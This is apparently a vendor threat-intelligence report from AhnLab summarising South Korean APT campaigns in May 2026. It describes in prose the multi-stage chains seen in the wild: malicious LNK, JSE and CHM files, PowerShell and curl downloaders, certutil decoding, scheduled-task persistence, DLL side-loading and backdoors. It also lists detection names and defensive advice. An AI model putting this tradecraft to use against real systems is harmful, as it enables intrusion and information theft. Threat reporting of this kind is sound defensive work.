Overview

AhnLab monitored APT (Advanced Persistent Threat) attacks—covert, sustained targeted attacks—using its own infrastructure. This report summarizes the types and statistics on domestic APT attacks identified during the month of May 2026 and discusses the characteristics of each type as well as AhnLab Response Overview.

Trends of APT Attacks in South Korea

Most of the APT attacks detected in South Korea were distributed via spear phishing (targeted phishing aimed at specific individuals or groups). In particular, attacks using LNK files accounted for the highest proportion, and attacks using CHM files were also detected.

Spear Phishing-Based Attacks

• Type A uses malicious PowerShell commands in an LNK file to connect to an external URL, download additional files, and execute AutoIt malware. It ensures persistence by registering a Task Scheduler job and performs functions such as command execution, directory querying, file uploading, and file downloading.
• Type B uses curl.Exe (Windows’ default command-line download tool) to download and execute a malicious HTA file in the %TEMP% directory. It is distributed via GitHub repositories or Google Drive and loads Infostealers (malware designed to steal information), keyloggers (malware that captures keystrokes), and backdoors into memory.
• Type C uses PowerShell code embedded within the LNK file to create and execute Base64-encoded data in %TEMP%, then downloads decoy files and malicious scripts from a GitHub repository. It creates a Task Scheduler entry to ensure persistence, deploys XenoRAT-type malware, and exfiltrates system information.
• Type D uses XML, JS, and PowerShell scripts embedded within the LNK file to generate data and register a Task Scheduler job. It then executes a malicious Python script via a BAT file and a compressed file, and launches a backdoor capable of executing remote commands and controlling files.
• Type E includes decoy files and malicious PowerShell commands within an LNK file that is disguised as a resume or document file. It generates VBS, BAT, and PowerShell scripts and registers them with the Task Scheduler; after executing a loader using the DLL side-loading technique, it injects a backdoor into a legitimate process.
• Type F uses CMD and PowerShell commands within the LNK file to download additional files. It copies curl.Exe to %TEMP%, executes a decoy PDF and a BAT downloader, installs a Python package, and then registers pythonw.Exe—disguised as a legitimate file—in the Task Scheduler. Finally, the Python backdoor performs command execution on the threat actor’s server and transmits the results.
• Type Unknown refers to cases distributed via spear phishing that do not fall under the preceding types.

Attacks Utilizing JSE

• Type G creates a malicious DLL and a decoy document in the %ProgramData% directory and loads the DLL into memory using regsvr32.Exe (a legitimate Windows tool). This DLL is a backdoor malware capable of performing malicious activities such as Information Theft.

Attacks Using CHM

• Type H involves an HTML script within a CHM help file that performs PowerShell command execution, generates a Base64-encoded VBScript, decodes it using certutil.Exe, and runs it via wscript.Exe. It then connects to an external C2 server to receive and execute additional scripts.

AhnLab Response Overview

The AhnLab product suite has addressed various malicious behaviors associated with this threat group using the following detection names: Backdoor/Win.Agent.C5882829, Backdoor/Win.Mudsdoor.R773004, Downloader/LNK.Generic.SC314654, Downloader/PS.Agent, Downloader/PowerShell.Agent, Downloader/VBS.Agent.SC314574, Infostealer/Win.Agent.C5882827, Trojan/BAT.Agent.SC315175, Trojan/JS.Agent.SC314582, Trojan/JSE.Agent, Trojan/LNK.Agent, Trojan/LNK.Loader.SC315176, Trojan/Python.Agent, Trojan/VBS.Loader, Trojan/XML.Task, Trojan/XML.Schedule, Unwanted/Win.MeshCmd.R700828, and others. The report noted that even recently identified activities may not be detected depending on the variant.

Conclusion

Domestic APT attacks often began through phishing emails disguised as work-related communications, and the malware combined LNK files, various scripts, and legitimate tools to execute backdoors and Infostealers. This can lead to the leakage of user PC information, the hijacking of System Control over infected systems, and the uploading of additional malware. The report concluded that it is necessary to verify senders, refrain from opening files from unknown sources, check for vulnerable system settings, apply the latest patches for operating systems and web browsers, and keep V3 updated to the latest version.